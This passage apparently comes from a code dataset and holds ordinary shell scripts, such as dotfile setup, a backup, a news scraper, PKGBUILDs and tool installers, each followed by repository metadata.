# add ssh key to agent and store passphrase in keychain
# POTENTIAL TODO: add steps for grepping ~/.ssh/id_ABC if id_ed25519 is not generated
grep -qF '~/.ssh/id_ed25519' ~/.ssh/config || echo -e 'Host *\n\tAddKeysToAgent yes\n\tIdentityFile ~/.ssh/id_ed25519' >> ~/.ssh/config
ssh-add --apple-use-keychain ~/.ssh/id_ed25519
echo -e '\nYou will now need to add the SSH key to your Github account. Follow the instructions at https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account\n'
read -p 'Press any key to continue once you have added the SSH key to your Github account.' -n1 -s
# clone my dotfiles repo into the local Github directory
git clone git@github.com:Lianathanoj/dotfiles.git $GITHUB_DIR/dotfiles
bash $GITHUB_DIR/dotfiles/setup/setup2.sh
| true
|
0bc7e8c3618a68c4eda4910ca384081de9911826
|
Shell
|
pylipp/sdd
|
/completion/sdd
|
UTF-8
| 1,824
| 3.59375
| 4
|
[
"MIT"
] |
permissive
|
# sdd completion
#
# @author: Sergei Eremenko (https://github.com/SmartFinn)
# @license: MIT license (MIT)
# @link: https://github.com/pylipp/sdd
_sdd_list_available() {
local app_name
command -v sdd >/dev/null || return 1
while read -r _ app_name; do
[ -n "$app_name" ] || continue
printf '%s\n' "$app_name"
done < <(sdd list --available)
return 0
}
_sdd_list_installed() {
local app_name
command -v sdd >/dev/null || return 1
while IFS='=' read -r app_name _; do
[ -n "$app_name" ] || continue
printf '%s\n' "$app_name"
done < <(sdd list --installed)
return 0
}
_sdd_completion() {
local cur prev word cword
local -a words=()
local -a opts=(
install
list
uninstall
upgrade
-h --help
-V --version
)
local -a list_opts=(
-a --available
-i --installed
-u --upgradable
)
_init_completion || return
for word in "${words[@]}"; do
case "$word" in
install)
COMPREPLY=( $(compgen -W "$(_sdd_list_available)" -- "$cur") )
return 0
;;
uninstall|upgrade)
COMPREPLY=( $(compgen -W "$(_sdd_list_installed)" -- "$cur") )
return 0
;;
esac
done
case "$prev" in
list)
COMPREPLY=($(compgen -W "${list_opts[*]}" -- "$cur"))
return 0
;;
-h | --help | \
-V | --version | \
-a | --available | \
-i | --installed | \
-u | --upgradable)
# stop completion if one of these option already specified
return 0
;;
*)
COMPREPLY=($(compgen -W "${opts[*]}" -- "$cur"))
return 0
;;
esac
}
complete -F _sdd_completion sdd
# vim: filetype=sh sw=4 ts=4 et
| true
|
712390134792f55329f59f74f28ef706cc60964c
|
Shell
|
poftwaresatent/bktools
|
/backup-l2.sh
|
UTF-8
| 565
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/sh
HOST=ide10190
SRC="/rolo /Users/rolphi"
FILTER='-e .DS_Store -e /rolo/tmp -e /Users/rolphi/Library/Logs -e /Users/rolphi/Library/Developer/Shared/Documentation -e /Users/rolphi/Library/Caches'
# find level 1 stamp file
L1STAMP=`ls -t $HOST-l1-*.stamp | head -n 1`
if [ -z "$L1STAMP" ]; then
echo "ERROR no level 1 stamp file found"
exit 2
fi
# level 2
STAMP=`date +'%F_%H-%M-%S_%z'`
touch $HOST-l2-$STAMP.stamp
find $SRC -type f -newer $L1STAMP | fgrep -v $FILTER | tee $HOST-l2-$STAMP.toc | tar -v -c -f $HOST-l2-$STAMP.tar -T /dev/stdin
| true
|
a10bc62a09c6d641b2439ca05f28e42a66882486
|
Shell
|
jerinshajit97/bash_scripts
|
/Sec_News24x7/secnews24x7.sh
|
UTF-8
| 1,031
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
echo "*********Running SEC NEWS 24x7***********"
echo "[+] clearing previous fetch"
echo "SEC NEWS 24x7 updated on $(date)" > secnews.txt
echo "[+] fetching hot news "
echo "[+] fetching headlines "
curl https://thehackernews.com/ | grep "</h2>" | sed -e 's/<[^>]*>//g' > news.txt
link=$(curl https://thehackernews.com/ | grep "'story-link'" | grep -Eo "(http|https)://[a-zA-Z0-9./?=_%:-]*")
i=0
for var in $link
do
url[$i]=$var
((i=i+1))
done
j=0
while IFS= read -r line; do
echo "**********************************************$line*******************************************************" >> secnews.txt
echo "[+] fetching more details "
curl ${url[$j]} | sed '/<script/,/<\/script>/d' | sed -e 's/<[^>]*>//g' | sed '/^$/d' | head -n 20 >> secnews.txt
((j=j+1))
printf "\n\n\n" >> secnews.txt
done < news.txt
echo "[+] removing tmp files "
rm news.txt
echo "[+] creating the file "
echo "[+] news saved in secnews.txt"
#cat secnews.txt
echo "[+] Process completed.Amigo!!! Its time to get some sleep"
| true
|
9fc5efa0d8057f93e5964df6ac230be6da2deb3e
|
Shell
|
mjamesruggiero/dotfiles
|
/merge_csvs.sh
|
UTF-8
| 511
| 3.96875
| 4
|
[] |
no_license
|
#!/bin/bash
# munge a series of CSVs into one big CSV
# takes the name of what will be the concatenated CSV
OUT_FILE_NAME=$1
i=0
for FILE_NAME in ./*.csv; do
if [ "$FILE_NAME" != "$OUT_FILE_NAME" ] ;
then
# echo "about to concat $FILE_NAME"
if [[ $i -eq 0 ]] ; then
head -1 $FILE_NAME > $OUT_FILE_NAME
fi
tail -n +2 $FILE_NAME >> $OUT_FILE_NAME # append from 2nd line of file
i=$(( $i + 1 )) # increment
fi
done
| true
|
c32486ff3b602549071d256c2c3bbc7208f9ffe5
|
Shell
|
dpitic/apue
|
/clang-config.sh
|
UTF-8
| 643
| 3.25
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
#
# File: clang-config.sh
# Author: dpitic
#
# Created on 29/01/2018, 8:44:05 AM
#
# Configures the .clang_complete file based on system type.
#
case `./systype.sh` in
"freebsd")
cp .clang_complete.freebsd .clang_complete
cp .clang_complete.freebsd .clang
;;
"openbsd")
cp .clang_complete.openbsd .clang_complete
cp .clang_complete.openbsd .clang
;;
"linux")
cp .clang_complete.linux .clang_complete
cp .clang_complete.linux .clang
;;
"macos")
cp .clang_complete.macos .clang_complete
cp .clang_complete.macos .clang
;;
*)
echo "Unknown platform" >&2
exit 1
esac
| true
|
0f31832b1c17079e89e37d90458d4f4e99a7b661
|
Shell
|
hortonworks/cloudbreak
|
/performance-test/perftest.sh
|
UTF-8
| 1,129
| 2.6875
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer",
"ANTLR-PD",
"CDDL-1.0",
"bzip2-1.0.6",
"Zlib",
"BSD-3-Clause",
"MIT",
"EPL-1.0",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-jdbm-1.00",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
: ${CB_PERFTEST_HOST:=192.168.99.100}
: ${CB_MOCK_HOST:="mockhosts"}
: ${CB_USERNAME:=admin@example.com}
: ${CB_PASSWORD:=cloudbreak}
: ${CB_NUMBER_OF_USERS:=1}
: ${CB_RAMPUP_SECONDS:=3}
: ${CB_DELAY_BEFORE_TERM:=60}
echo "[!!] Make sure you spinned up the mock server: CB_SERVER_ADDRESS=$CB_PERFTEST_HOST MOCK_SERVER_ADDRESS=$CB_MOCK_HOST gradle :integration-test:runMockServer"
echo "[!!] \$CB_MOCK_HOST ($CB_MOCK_HOST) must be resolvable from the running Cloudbreak backend"
echo "[!!] User \$CB_USERNAME ($CB_USERNAME) must exists in uaa database with password \$CB_PASSWORD ($CB_PASSWORD)"
docker run -it --rm \
-v `pwd`/conf:/opt/gatling/conf \
-v `pwd`/user-files:/opt/gatling/user-files \
-v `pwd`/results:/opt/gatling/results \
-e CB_PERFTEST_HOST=$CB_PERFTEST_HOST \
-e CB_MOCK_HOST=$CB_MOCK_HOST \
-e CB_NUMBER_OF_USERS=$CB_NUMBER_OF_USERS \
-e CB_RAMPUP_SECONDS=$CB_RAMPUP_SECONDS \
-e CB_DELAY_BEFORE_TERM=$CB_DELAY_BEFORE_TERM \
-e CB_USERNAME=$CB_USERNAME \
-e CB_PASSWORD=$CB_PASSWORD \
-e CB_HOSTNAME_ALIASES=$CB_HOSTNAME_ALIASES \
docker-private.infra.cloudera.com/cloudera_thirdparty/denvazh/gatling:2.3.1
| true
|
7c0b45a7abc6c63d42f349d7375439eee685c6fb
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/lib32-libmumble/PKGBUILD
|
UTF-8
| 1,751
| 2.640625
| 3
|
[] |
no_license
|
# shellcheck shell=bash
# shellcheck disable=SC2034,SC2148,SC2154
# Maintainer: Zeke Sonxx <zeke@zekesonxx.com>
# Contributer: Matjaz Mozetic <rationalperseus@gmail.com>
# Contributor: Jan Alexander Steffens (heftig) <jan.steffens@gmail.com>
# Contributor: Sven-Hendrik Haase <sh@lutzhaase.com>
# Contributor: Lauri Niskanen <ape@ape3000.com>
# Contributor: Sebastian.Salich@gmx.de
# Contributor: Doc Angelo
# Based both on the community/mumble package and the old lib32-libmumble package.
# https://git.archlinux.org/svntogit/community.git/tree/trunk/PKGBUILD?h=packages/mumble
# http://pkgbuild.com/git/aur-mirror.git/tree/lib32-libmumble/PKGBUILD
pkgname=lib32-libmumble
pkgver=1.2.18
pkgrel=1
arch=('x86_64')
pkgdesc="A voice chat application similar to TeamSpeak (32-bit overlay library)"
license=('BSD')
depends=("mumble=$pkgver" 'lib32-libgl')
makedepends=('boost' 'mesa' 'gcc-multilib')
url="http://mumble.sourceforge.net/"
source=("https://github.com/mumble-voip/mumble/releases/download/${pkgver}/mumble-${pkgver}.tar.gz")
md5sums=('3c448632142e0f38e693250965e8b6b1')
sha512sums=('bd8b10cb34733d566fd6aae2410e8fe5f098efe5c5b106f569112d4e5205d8a045d43a0adc02a7a9d3e16b15e3515d908784596f293a7e2972fba20830161074')
build() {
cd "$srcdir/mumble-$pkgver/overlay_gl" || exit
qmake-qt4 overlay_gl.pro QMAKE_CFLAGS+="-m32" QMAKE_LFLAGS+="-m32"
make
}
package() {
cd "$srcdir/mumble-$pkgver" || exit
# lib stuff
install -m755 -D "./release/libmumble.so.$pkgver" "$pkgdir/usr/lib32/mumble/libmumble.so.$pkgver"
ln -s "libmumble.so.$pkgver" "$pkgdir/usr/lib32/mumble/libmumble.so"
ln -s "libmumble.so.$pkgver" "$pkgdir/usr/lib32/mumble/libmumble.so.1"
ln -s "libmumble.so.$pkgver" "$pkgdir/usr/lib32/mumble/libmumble.so.1.2"
# license
install -d "$pkgdir/usr/share/licenses"
ln -s "/usr/share/licenses/mumble" "$pkgdir/usr/share/licenses/$pkgname"
}
| true
|
41bd2b7fd6f420f41d66866c21d9df26ec3a7ce4
|
Shell
|
aur-archive/checksums
|
/PKGBUILD
|
UTF-8
| 680
| 2.546875
| 3
|
[] |
no_license
|
# Contributor: Mladen Pejakovic <pejakm@gmail.com>
pkgname=checksums
pkgver=0.4
pkgrel=2
pkgdesc="Service menu and a small script for calculation of md5, sha1 and sha256 checksums. Based on KonqCheckSum service menu"
url="http://kde-look.org/content/show.php/KonqCheckSum?content=83460"
depends=('kdebase-workspace')
optdepends=()
options=()
license=('GPL')
arch=('any')
source=(checksums.desktop
checksums.sh)
md5sums=('94b14c8139ab72700638edf53b9354d7'
'f23f7ff8d8bc527bc08741c5da0f12bd')
build() {
cd ${srcdir}
install -D -m 755 checksums.sh ${pkgdir}/usr/bin/checksums.sh
install -D -m 755 checksums.desktop ${pkgdir}/usr/share/kde4/services/ServiceMenus/checksums.desktop
}
| true
|
01c3cb082789b51d99737231a5b52fbb379f9590
|
Shell
|
cl-/realtimeTicTac_mobile
|
/auto_restart_nodejs_server.min.UNIX.sh
|
UTF-8
| 729
| 3.515625
| 4
|
[] |
no_license
|
#!/bin/sh
while read userInput
do
echo To stop this script, press Ctrl-C.
echo To make this script do nothing, enter any non-empty value and press enter.
## test -n gives True if the length of string is non-zero --> 1st True leads to checking "break/continue" and executing it
test -n "$userInput" && continue
#kill all node instances before starting a new one
## killall node
##### ##### ##### pkill node
#use backtick (`) symbol so that node terminates itself when this script is terminated
`node sharedThingsServer.js` #so as to prevent node from running invisibly, which causes "Error: listen EADDRINUSE"
# Get PID of the previous command launched in this bash script
## PID = $!
## echo $PID
done
| true
|
ad3d58a9cd0c67656628d67d5912a102f58114ac
|
Shell
|
hapebe/linux-itw
|
/local-mail/mail-proc.sh
|
UTF-8
| 741
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/bash
#
# this is intended to complement an entry in /etc/aliases:
# "myprocessor: |/home/hapebe/...../mail-proc.sh"
#
# remember to run "newaliases" after modyfying that config file!
# newaliases was originally part of sendmail, but postfix (and
# probably other MTAs) provides a compatibility layer for this.
#
SCRIPT=$(readlink -f $0)
SCRIPTPATH=`dirname $SCRIPT`
LOGFILE=${SCRIPTPATH}/mail-proc.log
echo "This script ($0) has been called with $# parameters." >> $LOGFILE
for param in $@ ; do
echo "Parameter: $param" >> $LOGFILE
done
echo "--- end of params" >> $LOGFILE
echo "" >> $LOGFILE
echo "STDIN:" >> $LOGFILE
while read line ; do
echo $line >> $LOGFILE
done
echo "--- end of STDIN" >> $LOGFILE
echo "" >> $LOGFILE
| true
|
b7fb755ac8ff05e85496958d23d079348f6a0699
|
Shell
|
tjoskar/dotfiles
|
/home/bin/git-fyzzy-checkout
|
UTF-8
| 386
| 3.671875
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Use fzf to checkout a branch
# Check if it's a git repo
[[ $(git root 2>&1) == 'Not a git repo!' ]] && echo "Not a git repo!" && exit 1
branches=$(git branch --all) &&
branch=$(echo "$branches" |
fzf-tmux --cycle --height=50% --reverse -d $((2 + $(wc -l <<<"$branches"))) +m) &&
git checkout $(echo "$branch" | sed "s/.* //" | sed "s#remotes/[^/]*/##")
| true
|
83c222ecdf000b6274b7e0136525f2fa9ecb838b
|
Shell
|
mntech/pascalDD
|
/agora-java/tools/log_error_check.sh
|
UTF-8
| 409
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/sh
# Basic script to check the main scraper log for errors (timeouts, etc)
MAILTO=jbalint@gmail.com
LOGFILE=`/bin/ls -tr runlogs/run-*.log | tail -1`
echo "Log file is $LOGFILE"
ERRORS=`grep -n -A 0 ERROR $LOGFILE | grep -v 'content type is not an image:' | grep -v 'invalid curl result:'`
if [ "$ERRORS" != "" ] ; then
echo "Mailing"
echo "$ERRORS" | mail -s "Scraper Errors in $LOGFILE" $MAILTO
fi
| true
|
745d422ae7228997fcfe74ed1b93af777bc20193
|
Shell
|
chadrien/homebrew-formulas
|
/contrib/generate.sh
|
UTF-8
| 213
| 3.265625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -xe
CONTRIB_DIR=$(dirname $0)
export FORMULA_DIR=$(dirname $CONTRIB_DIR)/Formula
mkdir -p ${FORMULA_DIR}
for file in $(find ${CONTRIB_DIR}/generators -type f); do
bash -xe $file
done
| true
|
82a4225d15da7806be7153885430e42d1a0e4777
|
Shell
|
virtualstaticvoid/asdf-sonarscanner
|
/bin/install
|
UTF-8
| 1,186
| 4.125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -e
set -o pipefail
# set -x
ASDF_INSTALL_TYPE=${ASDF_INSTALL_TYPE:-version}
[ -n "$ASDF_INSTALL_VERSION" ] || (>&2 echo 'Missing ASDF_INSTALL_VERSION' && exit 1)
[ -n "$ASDF_INSTALL_PATH" ] || (>&2 echo 'Missing ASDF_INSTALL_PATH' && exit 1)
install_plugin() {
local install_type=$1
local version=$2
local install_path=$3
local download_url="$(get_download_url $install_type $version)"
local tmp_download=$(mktemp -d)
echo "Downloading sonar-scanner-cli from $download_url"
pushd $tmp_download > /dev/null
curl -L -s "$download_url" -o "download.zip"
unzip "download.zip" > /dev/null || exit 1
pushd "sonar-scanner-${version}-$(get_platform)" > /dev/null
cp -r . $install_path
popd > /dev/null
popd > /dev/null
rm -rf $tmp_download > /dev/null
}
get_platform() {
[ "Linux" = "$(uname)" ] && echo "linux" || echo "macosx"
}
get_download_url() {
local install_type=$1
local version=$2
local platform=$(get_platform)
echo "https://binaries.sonarsource.com/Distribution/sonar-scanner-cli/sonar-scanner-cli-${version}-${platform}.zip"
}
install_plugin "$ASDF_INSTALL_TYPE" "$ASDF_INSTALL_VERSION" "$ASDF_INSTALL_PATH"
| true
|
6dafa2ec5a5ed6da6f22256455a7aabbb030ec9e
|
Shell
|
XrosLiang/climlab
|
/conda-recipe/build.sh
|
UTF-8
| 1,055
| 3.09375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Based on conda-forge recipe for scipy
export LIBRARY_PATH="${PREFIX}/lib"
export C_INCLUDE_PATH="${PREFIX}/include"
export CPLUS_INCLUDE_PATH="${PREFIX}/include"
# Depending on our platform, shared libraries end with either .so or .dylib
if [[ `uname` == 'Darwin' ]]; then
# Also, included a workaround so that `-stdlib=c++` doesn't go to
# `gfortran` and cause problems.
#
# https://github.com/conda-forge/toolchain-feedstock/pull/8export CFLAGS="${CFLAGS} -stdlib=libc++ -lc++"
export CFLAGS="${CFLAGS} -stdlib=libc++ -lc++"
export LDFLAGS="-headerpad_max_install_names -undefined dynamic_lookup -bundle -Wl,-search_paths_first -lc++"
# conda compilers need the MacOSX10.9 SDK and need to be told where they are
# https://www.anaconda.com/utilizing-the-new-compilers-in-anaconda-distribution-5/
# Other uses may need to update this if they install MacOSX10.9.sdk somewhere else
export CONDA_BUILD_SYSROOT=$HOME/opt/MacOSX10.9.sdk
else
unset LDFLAGS
fi
$PYTHON -m pip install . --no-deps -vv
| true
|
357b7213266f158ce8ce586ed473679bf1f7c561
|
Shell
|
joshua-rutherford/gm-fabric-dashboard
|
/public/setPath.sh
|
UTF-8
| 1,979
| 4.34375
| 4
|
[] |
no_license
|
#!/bin/bash
# A script to set the template string __BASE_URL__
# Capture path of JS Bundle
pattern="static/js/main.*.js"
JS_BUNDLE=( $pattern )
echo $JS_BUNDLE
# Quit if the parameter is empty
[[ -z "$1" ]] && { echo "No path was entered." ; exit 1; }
# If parameter is undo, ask for confirmation and restore backup.
if [ "$1" == "undo" ]; then
echo "It looks like you want to revert to a clean backup"
read -p "Are you sure? " -n 1 -r
echo # (optional) move to a new line
if [[ $REPLY =~ ^[Yy]$ ]]; then
cp -rf index.html.old index.html
cp -rf $JS_BUNDLE.old $JS_BUNDLE
fi
exit 1
fi
echo "{$1}"
if [[ $1 != */gmadmin/ ]]
then
echo 'Your path does not terminate in /gmadmin/'
echo 'This path MUST terminate in /gmadmin/ to properly infer the absolute paths'
echo 'of the metrics to scrape. The app uses a RegExp to replace /gmadmin/ with the following:'
echo 'For JVM, /admin/metrics.json and /admin/threads'
echo 'For Golang, /admin/metrics'
exit 1
else
BASEURL=$(printf "%q" "$1")
echo 'It looks like you want to deploy the dashboard to' $BASEURL
echo 'The app uses a RegExp to replace /gmadmin/ with the following:'
echo 'For JVM, /admin/metrics.json and /admin/threads'
echo 'For Golang, /admin/metrics'
fi
# Check to make sure argument exists. Quit otherwise.
read -p "Are you sure? " -n 1 -r
echo # (optional) move to a new line
if [[ $REPLY =~ ^[Yy]$ ]]
then
# If the backup doesn't exist, copy the index just in case
if [ -f './index.html.old' ]; then
echo 'Backup already detected.'
else
echo 'Backing up clean index.html'
cp -rf index.html index.html.old
cp -rf $JS_BUNDLE $JS_BUNDLE.old
fi
# Filter the old index, writing to index.html
echo 'Changing __BASE_URL__ to' $BASEURL
cat index.html.old | sed -E 's%__BASE_URL__[/]?%'$BASEURL'%g' >index.html
cat $JS_BUNDLE.old | sed -E 's%__BASE_URL__[/]?%'$BASEURL'%g' >$JS_BUNDLE
fi
| true
|
260a1297ab17b82a9f47dd77119fbc095dea54f2
|
Shell
|
wenliangz/slideslicer
|
/scripts/makesets.sh
|
UTF-8
| 1,642
| 3.078125
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
CLASSES=(infl normal)
#DATADIR=../data/data_1024/infl_split/
#DATADIR=/repos/data/data_128_subsample_8x/fullsplit/
#CLASSES=(glom normal)
#DATADIR=../data/data_1024/glom_split/
DATADIR="$1"
cd $DATADIR;
DATADIR=$(pwd -P)
cd -
echo "CLASSES:"
for CLASS in ${CLASSES[@]}
do
echo -e "\t$CLASS"
done
test_ids=(70bb3032750d09e7549928c0dbf79afc30d7cb68 a1fc67fbb21f43b9e8904b9b46bd94f83493b37a f7f931a5cf3185a385e9aa34e6e9a566fc88000)
trainids=(c886827fe8c10b4699a0f1616331e36b46a05617 dfe3ee768f72bddd289c7d5bb88b15cbb89be7e6)
realpath() {
[[ $1 = /* ]] && echo "$1" || echo "$PWD/${1#./}"
}
for CLASS in ${CLASSES[@]}
do
mkdir -p ${DATADIR}/val/${CLASS}
mkdir -p ${DATADIR}/train/${CLASS}
for id in ${trainids[@]}
do
#echo ""
#ln -s ${DATADIR}/all/${CLASS}/${id}* ${DATADIR}/train/${CLASS}/
#find ${DATADIR}/all/${CLASS}/ -name "${id}*" -exec sh -c 'echo $PWD/$(readlink $1) ' _ {} \;
#find ${DATADIR}/all/${CLASS}/ -name "${id}*" -exec sh -c 'ln -s $PWD/$(readlink $1) '${DATADIR}/train/${CLASS}/'' _ {} \;
find ${DATADIR}/all/${CLASS}/ -name "${id}*" -exec sh -c 'ln -s $(readlink -f $1) '${DATADIR}/train/${CLASS}/'' _ {} \;
done
echo -e "see\t${DATADIR}/train/"
for id in ${test_ids[@]}
do
#ln -s ${DATADIR}/all/${CLASS}/${id}* ${DATADIR}/val/${CLASS}/
find ${DATADIR}/all/${CLASS}/ -name "${id}*" -exec sh -c 'ln -s $(readlink -f $1) '${DATADIR}/test/${CLASS}/'' _ {} \;
#find ${DATADIR}/all/${CLASS}/ -name "${id}*" -exec sh -c 'ln -s $PWD/$(readlink $1) '${DATADIR}/val/${CLASS}/'' _ {} \;
done
echo -e "see\t${DATADIR}/val/"
done
| true
|
aca772712c029e0b55599de2bf71113062f7423c
|
Shell
|
rubenerd/rubens-lunchbox
|
/resursive-ln.sh
|
UTF-8
| 238
| 3.1875
| 3
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
## Recursively build directory of symlinks
## Subdirectories also symlinked
## Desirable if you want to add files at root level
root=/some/directory
destination=.
for file in ${root}/*; do
ln -s ${file} ${destination}
done
| true
|
8864a92b78a8349d6a083ccc8f0ff8ec808a03b8
|
Shell
|
netqyq/shell-examples
|
/code/CH07/if_exam3.sh
|
UTF-8
| 170
| 3.328125
| 3
|
[
"MIT"
] |
permissive
|
# if_exam3: input a file name and test the file exist or not.
#!/bin/sh
if [ ! -e "$1" ]
then
echo "file $1 do not exist."
exit 1
else
echo "file $1 exits."
fi
| true
|
af3610e8333034f9a5e48dd87fa6a4ade3beffd5
|
Shell
|
patel327/ece364
|
/Prelab01/.svn/text-base/exist.bash.svn-base
|
UTF-8
| 192
| 3.296875
| 3
|
[] |
no_license
|
#! /bin/bash
#
#$Author$
#$Date$
#$HeadURL$
#$Revision$
#
while(($# != 0))
do
if [[ -r $1 ]]
then
echo "File $1 is readable!"
elif [[ ! -e $1 ]]
then
touch $1
fi
shift
done
exit 0
| true
|
ae356ef934fb2a533eece0044b52b0ca74eeb138
|
Shell
|
snikitav/palloc
|
/stress_test_suit.sh
|
UTF-8
| 291
| 2.8125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
mkdir -p build
cd build
for I in `seq 1 256`
do
for J in `seq 1 256`
do
echo "BLOCK_SIZE=$I POOL_SIZE=$J"
(cmake .. -DBLOCK_SIZE=$I -DPOOL_SIZE=$J -DCMAKE_BUILD_TYPE=Debug && make) &>/dev/null
./out/test/palloc_test
echo ""
done;
done;
| true
|
99fee1840a594612e96cc3e16c409441d099cc2b
|
Shell
|
hobofan/dotfiles
|
/bin/tat
|
UTF-8
| 121
| 2.59375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
#
# Attach or create tmux session named the same as current directory.
#
tmux new-session -As `basename $PWD`
| true
|
232f7f051286fad17fac41375e58c739df9b2bba
|
Shell
|
HenryChenV/ChaosSpace
|
/rdo_reposerver/build.sh
|
UTF-8
| 1,320
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/sh
if [ ! `id -u` == 0 ];then
echo pls run as root !
exit 1
fi
RDO_RELEASE=rdo-release-icehouse-4.noarch.rpm
RDO_DIR=openstack-icehouse/
RDO_ROOT=https://repos.fedorapeople.org/repos/openstack/
# #选择一台CentOS服务器,安装以下软件:
# yum -y install yum-utils createrepo yum-plugin-priorities
# yum -y install httpd
# #设置httpd
# chkconfig httpd on
# service httpd start
#获取repo文件并使用reposync同步源
# if [ -e $RDO_DIR/$RDO_RELEASE ]; then
# RDO_URL=$RDO_DIR/$RDO_RELEASE
# else
# RDO_URL=$RDO_RDOT/$RDO_DIR/$RDO_RELEASE
# fi
# yum -y install $RDO_URL
# yum repolist #可以看到源的id列表
#同步openstack-icehouse这个repo
cd /var/www/html/
reposync --repoid=openstack-icehouse
#
# #第一次同步时间较长,同步结束后
# createrepo –update /var/www/html/openstack-icehouse
# #此处若使用其他目录下的文件夹的符号链接到/var/www/html处,需要关闭SELinux的安全选项
# setenforce 0
#
# #添加以下内容到其中已有的22端口这条规则的下面
# sed -i.backup 's/\(-A INPUT -m state --state NEW -m tcp -p tcp --dport 22 -j ACCEPT\)/\1\n-A INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT\n-A INPUT -m state --state NEW -m tcp -p tcp --dport 3306 -j ACCEPT/' /etc/sysconfig/iptables
exit 0
| true
|
e9a2d736f35dca0cfe1d3d2ac005d7ee86d48fac
|
Shell
|
kaltura/server-bin-linux-64bit
|
/run/run-segmenter.sh
|
UTF-8
| 371
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
SYSTEM_INI_FILE=/etc/kaltura.d/system.ini
if [ -r "$SYSTEM_INI_FILE" ];then
. $SYSTEM_INI_FILE
else
echo "I could not source $SYSTEM_INI_FILE. Exiting."
exit 1
fi
KALTURA_BIN=$BASE_DIR/bin
KALTURA_BIN_DIRS=$KALTURA_BIN
KALTURA_BIN_FFMPEG=$KALTURA_BIN_DIRS/ffmpeg-0.10-dir/lib
LD_LIBRARY_PATH=$KALTURA_BIN_FFMPEG $KALTURA_BIN_FFMPEG/segmenter $@
| true
|
9b9e0ba731cc36853cc5a65404a0cf6d4ccd338f
|
Shell
|
lavacano/pengwin-setup
|
/pengwin-setup.d/uninstall/go.sh
|
UTF-8
| 469
| 3.328125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# shellcheck source=/usr/local/pengwin-setup.d/uninstall/uninstall-common.sh
source "$(dirname "$0")/uninstall-common.sh" "$@"
function main() {
echo "Uninstalling go"
echo "Removing $go_dir"
sudo_rem_dir "/usr/local/go"
echo "Removing go build cache"
rem_dir "$HOME/.cache/go-build"
echo "Removing PATH modifier..."
sudo_rem_file "/etc/profile.d/go.sh"
# whiptail user go directory
}
if show_warning "go" "$@"; then
main "$@"
fi
| true
|
724795a6eb3cd7c63969f84aa198b91be73c73cd
|
Shell
|
k-tada/dotfiles
|
/setup_scripts/nvim.sh
|
UTF-8
| 235
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
function command_exists {
command -v "$1" > /dev/null;
}
###
# install NeoVim
if ! command_exists nvim ; then
echo " --- NeoVim --- "
brew install neovim/neovim/neovim
pip install neovim
echo " --- End --- "
fi
| true
|
f8d9d89d2b0a1a55e97b003d7d4631f40b00f1b5
|
Shell
|
dcrdev/cardano-nft-maker
|
/init.sh
|
UTF-8
| 392
| 2.75
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
network="testnet"
working_dir="$HOME/cardano-nft-maker-testnet"
if [[ $1 == 'mainnet' ]]; then
network="mainnet"
working_dir="$HOME/cardano-nft-maker-mainnet"
cp keys/main.payment.* ./backend-server/mainnet/priv/wallet/main
else
cp keys/test.payment.* ./backend-server/testnet/priv/wallet/test
fi
cp keys/arweave-key* ./backend-server
echo "${working_dir} ${network}"
| true
|
c90012fb985bf4da036523b069982dacb79b35d5
|
Shell
|
kirakira/opencensus-cpp
|
/tools/presubmit.sh
|
UTF-8
| 1,739
| 3.1875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
#
# Copyright 2018, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# presubmit:
# Run a slow but complete check of the code to make sure:
# - Everything builds.
# - Tests pass.
# - Sanitizers pass.
#
# This is intended to be run manually and locally, not as part of
# continuous integration.
readonly R="======================================="
readonly BOLD="\\033[1m"
readonly ERR="\\033[31;1m"
readonly NORMAL="\\033[0m"
function run() {
echo ""
echo -e "${BOLD}${R}${R}"
echo "Running: $@"
echo -e "${R}${R}${NORMAL}"
$@
ret="$?"
if [[ "${ret}" -ne 0 ]]; then
echo ""
echo -e "${ERR}>>> Error: returned code ${ret} <<<${NORMAL}"
exit ${ret}
fi
}
t0="$(date +%s)"
buildables="-- $(bazel query -k --noshow_progress "kind('^cc', //...)")"
tests="-- $(bazel query -k --noshow_progress \
"kind(test, //...) \
except attr('tags', 'manual', //...)")"
run bazel build $buildables
run bazel test $tests
run bazel build -c opt $buildables
run bazel test -c opt $tests
for config in asan ubsan; do
run bazel test --config=$config $tests
run bazel test --config=$config -c opt $tests
done
t1="$(date +%s)"
echo ""
echo "Succeeded after $((t1 - t0)) secs."
| true
|
9439c8b84eaea415e37fa79c0e9281178fc0cb7b
|
Shell
|
qqqestion/dot-files
|
/.zshrc
|
UTF-8
| 1,394
| 2.78125
| 3
|
[] |
no_license
|
# Path to your oh-my-zsh installation.
# export ZSH="~/.oh-my-zsh"
